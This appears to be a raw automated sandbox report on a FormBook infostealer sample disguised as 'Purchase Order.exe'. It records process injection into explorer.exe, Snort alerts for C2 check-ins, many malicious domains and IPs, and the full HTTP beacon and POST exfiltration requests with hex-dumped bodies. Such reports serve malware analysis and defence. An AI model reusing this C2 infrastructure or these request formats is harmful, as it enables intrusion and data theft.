Source:	Binary string: wntdll.pdbUGP source: sphybwtjm.exe, 00000001.00000003.251841903.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, sphybwtjm.exe, 00000001.00000003.252365334.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, sphybwtjm.exe, 00000002.00000002.349936877.000000000163F000.00000040.00000800.00020000.00000000.sdmp, sphybwtjm.exe, 00000002.00000003.255530545.0000000001382000.00000004.00000800.00020000.00000000.sdmp, sphybwtjm.exe, 00000002.00000002.348530931.0000000001520000.00000040.00000800.00020000.00000000.sdmp, sphybwtjm.exe, 00000002.00000003.254208029.00000000011E4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.780873757.00000000045DF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.779024693.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.350115654.0000000004329000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.347901130.000000000418E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: sphybwtjm.exe, sphybwtjm.exe, 00000002.00000002.349936877.000000000163F000.00000040.00000800.00020000.00000000.sdmp, sphybwtjm.exe, 00000002.00000003.255530545.0000000001382000.00000004.00000800.00020000.00000000.sdmp, sphybwtjm.exe, 00000002.00000002.348530931.0000000001520000.00000040.00000800.00020000.00000000.sdmp, sphybwtjm.exe, 00000002.00000003.254208029.00000000011E4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000010.00000002.780873757.00000000045DF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.779024693.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.350115654.0000000004329000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.347901130.000000000418E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: sphybwtjm.exe, 00000002.00000002.350917001.00000000033E0000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: sphybwtjm.exe, 00000002.00000002.350917001.00000000033E0000.00000040.10000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C49
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 0_2_00406873 FindFirstFileW,FindClose,	0_2_00406873
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003E2C80 FindFirstFileW,FindNextFileW,FindClose,	16_2_003E2C80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003E2C7A FindFirstFileW,FindNextFileW,FindClose,	16_2_003E2C7A

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then pop edi	16_2_003D8880
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then pop edi	16_2_003D887F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then pop edi	16_2_003D4378

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.patrickguarte.com
Source: C:\Windows\explorer.exe	Domain query: www.bandmarket.live
Source: C:\Windows\explorer.exe	Network Connect: 150.95.59.33 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 217.160.0.87 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 85.159.66.93 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.montazeran.net
Source: C:\Windows\explorer.exe	Network Connect: 192.64.116.149 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.aurakids.website
Source: C:\Windows\explorer.exe	Domain query: www.paulmontecalvo.com
Source: C:\Windows\explorer.exe	Network Connect: 154.209.88.140 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.modbox.site
Source: C:\Windows\explorer.exe	Domain query: www.wewantabreak.com
Source: C:\Windows\explorer.exe	Domain query: www.khelojeetopro.com
Source: C:\Windows\explorer.exe	Domain query: www.nnncb.top
Source: C:\Windows\explorer.exe	Network Connect: 193.141.64.241 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 63.32.216.166 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.biggaming.xyz
Source: C:\Windows\explorer.exe	Network Connect: 46.249.204.182 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.occludy.com
Source: C:\Windows\explorer.exe	Network Connect: 155.159.61.221 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 74.124.203.191 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.96.162.130 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 51.79.230.147 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.malaya.live
Source: C:\Windows\explorer.exe	Domain query: www.parkperge.com
Source: C:\Windows\explorer.exe	Domain query: www.majordaiyanoace.com
Source: C:\Windows\explorer.exe	Domain query: www.lilustrlousdates.com
Source: C:\Windows\explorer.exe	Network Connect: 3.13.90.76 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 38.40.162.145 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.opulentdome.uk
Source: C:\Windows\explorer.exe	Network Connect: 185.106.208.3 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.175.163.144 80	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49714 -> 51.79.230.147:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49714 -> 51.79.230.147:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49714 -> 51.79.230.147:80
Source: Traffic	Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.7:53336 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49734 -> 3.13.90.76:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49734 -> 3.13.90.76:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49734 -> 3.13.90.76:80

Performs DNS queries to domains with low reputation

Source: C:\Windows\explorer.exe

DNS query: www.biggaming.xyz

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.majordaiyanoace.com/hcfu/

Source: Joe Sandbox View	ASN Name: KPNNL KPNNL
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US

Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=BxtzAL4W5AO3uLI59q371KiLBxUzW2j+OYwN/F4Eg4C0p2x+AnoX0pyIV2L0uhGw1+4403oJ3BUP5BdGKU8IqK17GGLz449g8HGlF3Hp/yIQ HTTP/1.1Host: www.wewantabreak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?u0Gp2vp8=yYn+qZAupgKndVEJZAA+lgE9F5IM2sy/uZGFuMXNIoF6xPzYCilz1R0fY+ZXeAeHxVBnntuSE8HuR3hJw5pyMvZ/VaC3rRJ0nFaxYVwTY2Y1&5jSp=DfjdjluHJP1L6t HTTP/1.1Host: www.modbox.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=3O8YptSPemKM8sIzZF8JOEGsdynbMd9NIarJRYJ/0cybmcm84igDod77Kw8YrhDfbeeXJmV/Xta+McyiqIfptDKdRtzZKR6FvkWjf1CaB2nt HTTP/1.1Host: www.occludy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?u0Gp2vp8=QpRnf8hbMplr0MVruU+mSsmXd47Y/RN6g+aq49FGHEQqzvBAGK38lH6pvC4RIkCAaMFgrfUcGt/BsHWKvIAR7oL0ypwQXqHPXRUpgIJQNUAI&5jSp=DfjdjluHJP1L6t HTTP/1.1Host: www.patrickguarte.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=FnNfFBdE6KPnVJCtupekHJkjgZFJe5QHOUSjJCZmfBdQKmSNG8cathNKdTXwFUOlpWErHg09uuesQ1LGhXMc+UdVb1pWxSsiOvNgB/qg6YJ5 HTTP/1.1Host: www.opulentdome.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?u0Gp2vp8=e8urorjn5YtBqVBAKQkFOVgb5XRHX95iuVbYmP4qxYw81TZ13rhAoUApmzfpT8nnssMZ1gBiQNZAQWNQOMLHZ0WRUsNJ0JTIQulzNrWS92rI&5jSp=DfjdjluHJP1L6t HTTP/1.1Host: www.malaya.liveConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=OmX4tUPXqRB8MMCbJ2d2I1QXSAa/kGMN1kVgIVLBij3Fuh3JYlWO9rbbVhNUJ+THoGRZCsrEKqKuThOHyDfP/PgcDPlZBbCCTOt+7qepiG6w HTTP/1.1Host: www.nnncb.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?u0Gp2vp8=nmIKxue9fq/wPVZukOB9TkwbQhnMn+EZhkHuSgXE385x5HS1Nfm9dHmrnO7NAE1ZtguQW3vFvHO2aEKxRmVjqrDRtY5yZbLfhBI/hScq3dTS&5jSp=DfjdjluHJP1L6t HTTP/1.1Host: www.majordaiyanoace.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=UPFzOWHvXr6LKM54fFGvr+bgYv8T+gbn3IMA7mHIEAJt3ghNPXPHkJgJBAr3zVB6bc8AwaR/viz1MkvVp6+rG9931Jf00GsCyWVh4zhHjPJo HTTP/1.1Host: www.bandmarket.liveConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?u0Gp2vp8=N5Qoe7UIPaIJGls62JHU55z9VEWHJXpA5+wYVkYKdF3K4Zdll/5ZVGJr2YZtu9BOKd0IRETCZdDAH2zdX5+9rG9zeMIKFk9wrK0cQWJhYt3t&5jSp=DfjdjluHJP1L6t HTTP/1.1Host: www.aurakids.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt HTTP/1.1Host: www.parkperge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt HTTP/1.1Host: www.parkperge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt HTTP/1.1Host: www.parkperge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt HTTP/1.1Host: www.parkperge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt HTTP/1.1Host: www.parkperge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt HTTP/1.1Host: www.parkperge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt HTTP/1.1Host: www.parkperge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt HTTP/1.1Host: www.parkperge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt HTTP/1.1Host: www.parkperge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?u0Gp2vp8=hgu/VmoXDf6UNxe0oUcrLUetbm135fy9k2oFvNtbYeh4n6osOzYSt1ckvEFN+4fwt+77PX6U4+O9/Te6nTne3r1wHJXq9JP+reirnUB6JbLe&5jSp=DfjdjluHJP1L6t HTTP/1.1Host: www.paulmontecalvo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=4DW0Ix2ISCDXzyRIq6nLWpFg/kOd6MPQeoh+U0+q17Szsp1AtfvcjVsYAYVpuBtjTM9sWhorW0wi6/FtiSniUr4Ev2EWFbeUdNVgc9Noh4aH HTTP/1.1Host: www.lilustrlousdates.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?u0Gp2vp8=EAGH4IFhh6xE7YX+q6dzLzxowCGyCVWdEG2UGekGzSzRY3UgsSkbc9AFTcp0S8/1Y2oVSaiG2hU25Np27E35wcBaAhf/HofUYUzmWEnkiOgR&5jSp=DfjdjluHJP1L6t HTTP/1.1Host: www.montazeran.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=MNpom6rckKTYc/p1bd1msiE7/E65ho0u4Akvh+C3tvGatf13TKlIwaeKtMXL5ZEx/m2/gQUExMh3ECGJi31qDG5C0hkBNbhOEhSrDflhNah3 HTTP/1.1Host: www.khelojeetopro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?u0Gp2vp8=DcR1klBM4JBmZMLd6nvoC7lGrdIYWHbYnViGVkJW/JRBNZmMbg24lMYBXluvYDtmC8yqXkPgj1fAOXZkFouqzsLqhHeORSR6vsolbcc5pjEQ&5jSp=DfjdjluHJP1L6t HTTP/1.1Host: www.biggaming.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=BxtzAL4W5AO3uLI59q371KiLBxUzW2j+OYwN/F4Eg4C0p2x+AnoX0pyIV2L0uhGw1+4403oJ3BUP5BdGKU8IqK17GGLz449g8HGlF3Hp/yIQ HTTP/1.1Host: www.wewantabreak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 66.96.162.130 66.96.162.130
Source: Joe Sandbox View	IP Address: 66.96.162.130 66.96.162.130

Source: global traffic	HTTP traffic detected: POST /hcfu/ HTTP/1.1Host: www.modbox.siteConnection: closeContent-Length: 194Cache-Control: no-cacheOrigin: http://www.modbox.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.modbox.site/hcfu/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 30 47 70 32 76 70 38 3d 28 61 50 65 70 73 5a 53 75 53 79 67 50 6c 59 5f 63 53 30 76 75 6a 4a 2d 47 50 38 63 35 64 54 30 31 71 75 4f 75 4f 65 54 46 34 56 72 33 62 4c 6d 41 77 35 47 69 56 38 66 55 38 4e 33 4a 69 37 6e 7e 46 63 49 6f 63 75 6d 48 62 79 4c 4c 48 4e 74 78 4e 73 75 43 63 46 56 64 70 7a 5f 37 79 46 4f 7a 57 57 65 62 53 6c 55 64 67 4e 41 55 66 45 43 63 73 67 4c 46 6a 32 62 7e 66 39 61 30 72 4b 6d 50 50 74 64 64 37 78 6a 50 76 45 30 6b 31 56 66 79 39 79 67 62 52 65 62 70 4c 4f 78 77 35 35 5f 6a 55 36 74 31 5f 31 53 6d 49 74 69 4e 62 4b 62 6b 39 70 50 7a 77 55 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=(aPepsZSuSygPlY_cS0vujJ-GP8c5dT01quOuOeTF4Vr3bLmAw5GiV8fU8N3Ji7n~FcIocumHbyLLHNtxNsuCcFVdpz_7yFOzWWebSlUdgNAUfECcsgLFj2b~f9a0rKmPPtdd7xjPvE0k1Vfy9ygbRebpLOxw55_jU6t1_1SmItiNbKbk9pPzwU.
Source: global traffic	HTTP traffic detected: POST /hcfu/ HTTP/1.1Host: www.occludy.comConnection: closeContent-Length: 194Cache-Control: no-cacheOrigin: http://www.occludy.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.occludy.com/hcfu/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 30 47 70 32 76 70 38 3d 36 4d 55 34 71 59 6e 66 66 47 79 4b 33 35 78 4f 54 6e 41 59 48 6c 75 54 64 48 54 4c 43 66 55 35 4b 50 48 45 63 4b 68 76 68 4f 65 75 39 6f 48 31 79 77 6f 50 34 65 7a 76 53 68 34 4f 6c 6b 48 6c 51 62 69 34 4a 30 35 4c 57 39 61 46 58 73 72 6c 68 38 44 58 7a 58 57 61 5a 73 4b 36 59 41 72 4b 76 6b 58 38 56 6a 53 5a 55 68 79 78 62 67 76 69 7a 38 4c 4e 70 2d 44 6d 57 47 45 4c 54 6a 32 70 76 2d 52 6f 6c 62 48 36 57 34 68 30 57 76 52 48 77 35 33 53 35 73 55 37 5a 45 54 6b 77 56 35 6c 71 34 67 57 50 45 72 4f 6f 77 72 64 54 42 4f 62 62 47 4d 42 43 4e 30 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=6MU4qYnffGyK35xOTnAYHluTdHTLCfU5KPHEcKhvhOeu9oH1ywoP4ezvSh4OlkHlQbi4J05LW9aFXsrlh8DXzXWaZsK6YArKvkX8VjSZUhyxbgviz8LNp-DmWGELTj2pv-RolbH6W4h0WvRHw53S5sU7ZETkwV5lq4gWPErOowrdTBObbGMBCN0.
Source: global traffic	HTTP traffic detected: POST /hcfu/ HTTP/1.1Host: www.patrickguarte.comConnection: closeContent-Length: 194Cache-Control: no-cacheOrigin: http://www.patrickguarte.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.patrickguarte.com/hcfu/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 30 47 70 32 76 70 38 3d 64 72 35 48 63 4c 70 54 58 75 56 56 31 4f 39 4b 68 58 32 41 51 38 75 57 61 34 37 5a 31 6a 38 35 6c 75 36 5a 33 5f 73 5a 45 6d 6f 6b 37 6f 4a 39 44 37 57 4b 37 33 6e 66 6b 68 49 38 41 6e 36 74 55 35 4e 77 6d 75 45 57 43 71 58 68 6a 6e 53 53 77 37 41 52 6e 71 50 77 37 5a 39 77 57 4a 62 30 43 44 42 33 67 76 6c 54 42 6b 6b 44 74 43 32 67 71 4c 42 4e 58 6b 51 57 4d 39 4d 6e 4e 5a 4c 51 54 6f 59 53 68 38 77 6c 70 6f 59 64 4a 62 56 65 57 76 6f 6d 66 79 55 50 6f 42 76 65 6f 45 4d 45 28 63 67 77 51 6d 48 61 4c 4a 58 47 31 47 77 30 71 54 75 64 36 63 4d 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=dr5HcLpTXuVV1O9KhX2AQ8uWa47Z1j85lu6Z3_sZEmok7oJ9D7WK73nfkhI8An6tU5NwmuEWCqXhjnSSw7ARnqPw7Z9wWJb0CDB3gvlTBkkDtC2gqLBNXkQWM9MnNZLQToYSh8wlpoYdJbVeWvomfyUPoBveoEME(cgwQmHaLJXG1Gw0qTud6cM.
Source: global traffic	HTTP traffic detected: POST /hcfu/ HTTP/1.1Host: www.opulentdome.ukConnection: closeContent-Length: 194Cache-Control: no-cacheOrigin: http://www.opulentdome.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.opulentdome.uk/hcfu/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 30 47 70 32 76 70 38 3d 49 6c 6c 5f 47 33 34 50 32 36 6a 48 58 38 6e 4d 38 35 36 79 4d 4b 49 68 6c 4a 39 49 4b 4a 4a 47 41 52 71 53 4a 69 56 76 52 68 52 33 4a 44 66 4f 4f 50 38 67 78 67 4e 41 58 7a 50 5f 50 6e 4b 6b 6c 51 49 51 61 52 6c 53 69 66 69 55 58 53 66 31 68 56 77 42 37 57 6c 72 65 6a 73 4e 68 42 38 55 44 76 46 6a 4c 4c 7e 69 39 2d 6b 44 63 58 52 45 46 5a 42 76 67 79 68 42 31 72 31 69 4d 4d 6a 4d 4c 62 47 62 71 58 53 6c 4b 47 51 51 54 6a 45 65 72 4b 45 6c 4b 6a 6b 6b 46 65 42 30 76 6b 47 2d 52 56 37 36 4c 52 6f 47 51 62 7a 65 57 76 42 55 4e 32 68 35 7a 64 45 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=Ill_G34P26jHX8nM856yMKIhlJ9IKJJGARqSJiVvRhR3JDfOOP8gxgNAXzP_PnKklQIQaRlSifiUXSf1hVwB7WlrejsNhB8UDvFjLL~i9-kDcXREFZBvgyhB1r1iMMjMLbGbqXSlKGQQTjEerKElKjkkFeB0vkG-RV76LRoGQbzeWvBUN2h5zdE.
Source: global traffic	HTTP traffic detected: POST /hcfu/ HTTP/1.1Host: www.malaya.liveConnection: closeContent-Length: 194Cache-Control: no-cacheOrigin: http://www.malaya.liveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.malaya.live/hcfu/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 30 47 70 32 76 70 38 3d 54 2d 47 4c 72 63 69 35 39 66 4e 41 67 6e 52 48 59 79 77 72 45 46 52 59 37 52 4a 6b 63 4b 63 61 73 46 48 74 75 50 59 58 36 37 73 51 34 54 64 51 31 34 4d 33 70 55 30 6f 6a 44 32 33 63 35 71 4a 67 35 30 52 33 43 31 4e 51 74 64 37 59 68 4e 49 43 34 61 56 61 47 47 4e 45 37 63 56 38 4b 6a 47 54 75 74 37 52 39 53 72 6f 57 4b 79 45 51 77 31 67 7a 48 45 4d 74 73 32 6c 70 5a 57 52 41 49 46 36 54 6d 56 49 75 4d 5a 34 37 53 51 51 64 69 6c 73 70 35 55 4a 37 61 6e 69 35 61 34 4b 62 33 61 43 6e 6a 78 69 50 4c 78 36 41 55 7a 6f 30 56 66 28 33 37 72 57 6e 73 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=T-GLrci59fNAgnRHYywrEFRY7RJkcKcasFHtuPYX67sQ4TdQ14M3pU0ojD23c5qJg50R3C1NQtd7YhNIC4aVaGGNE7cV8KjGTut7R9SroWKyEQw1gzHEMts2lpZWRAIF6TmVIuMZ47SQQdilsp5UJ7ani5a4Kb3aCnjxiPLx6AUzo0Vf(37rWns.
Source: global traffic	HTTP traffic detected: POST /hcfu/ HTTP/1.1Host: www.nnncb.topConnection: closeContent-Length: 194Cache-Control: no-cacheOrigin: http://www.nnncb.topUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.nnncb.top/hcfu/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 30 47 70 32 76 70 38 3d 44 6b 28 59 75 69 4f 66 79 7a 52 2d 4c 4e 36 6d 4d 33 64 2d 4f 33 51 57 58 58 32 42 6b 32 51 4c 32 57 68 46 48 58 6e 74 6f 53 7a 5a 67 32 79 41 4e 56 66 5f 68 36 48 41 63 53 70 55 5a 61 76 64 77 51 4a 2d 63 66 72 35 46 36 47 47 57 6a 7e 6e 77 43 7a 45 79 74 6f 43 50 4d 55 42 47 5a 4f 4d 66 39 74 61 7a 74 69 76 67 67 76 4c 6e 6a 51 54 67 30 45 6b 4f 35 4e 42 55 37 48 6b 70 46 53 72 46 35 68 66 31 45 74 52 37 75 75 32 50 41 52 4a 47 47 51 48 55 34 38 2d 75 48 49 44 30 6a 32 68 77 59 4a 54 58 4d 79 4e 77 56 4f 77 4b 64 43 76 64 77 79 46 54 79 34 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=Dk(YuiOfyzR-LN6mM3d-O3QWXX2Bk2QL2WhFHXntoSzZg2yANVf_h6HAcSpUZavdwQJ-cfr5F6GGWj~nwCzEytoCPMUBGZOMf9taztivggvLnjQTg0EkO5NBU7HkpFSrF5hf1EtR7uu2PARJGGQHU48-uHID0j2hwYJTXMyNwVOwKdCvdwyFTy4.
Source: global traffic	HTTP traffic detected: POST /hcfu/ HTTP/1.1Host: www.majordaiyanoace.comConnection: closeContent-Length: 194Cache-Control: no-cacheOrigin: http://www.majordaiyanoace.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.majordaiyanoace.com/hcfu/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 30 47 70 32 76 70 38 3d 71 6b 67 71 79 61 72 31 52 72 4f 6a 45 51 78 7a 75 64 4e 37 55 6d 31 59 55 67 50 58 6c 50 70 66 6a 48 7e 57 61 68 62 46 69 73 6f 71 31 51 32 72 49 66 75 4c 43 30 71 4e 72 4e 54 61 41 6c 49 79 6b 30 47 72 55 57 4c 2d 76 77 69 30 56 6d 47 72 64 6c 6c 69 6d 36 65 77 72 5a 59 74 55 62 61 66 6f 77 45 66 70 6d 45 64 30 37 6d 69 39 67 66 4d 74 77 4d 7a 47 57 58 79 63 35 43 53 79 57 38 31 7e 71 6a 61 54 4c 54 50 61 44 54 65 76 62 56 4b 76 75 69 67 78 76 34 6b 70 69 34 52 54 70 52 6c 4e 4b 54 6b 72 69 7e 76 70 4d 45 6a 6a 35 53 37 68 41 73 51 73 5a 6f 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=qkgqyar1RrOjEQxzudN7Um1YUgPXlPpfjH~WahbFisoq1Q2rIfuLC0qNrNTaAlIyk0GrUWL-vwi0VmGrdllim6ewrZYtUbafowEfpmEd07mi9gfMtwMzGWXyc5CSyW81~qjaTLTPaDTevbVKvuigxv4kpi4RTpRlNKTkri~vpMEjj5S7hAsQsZo.
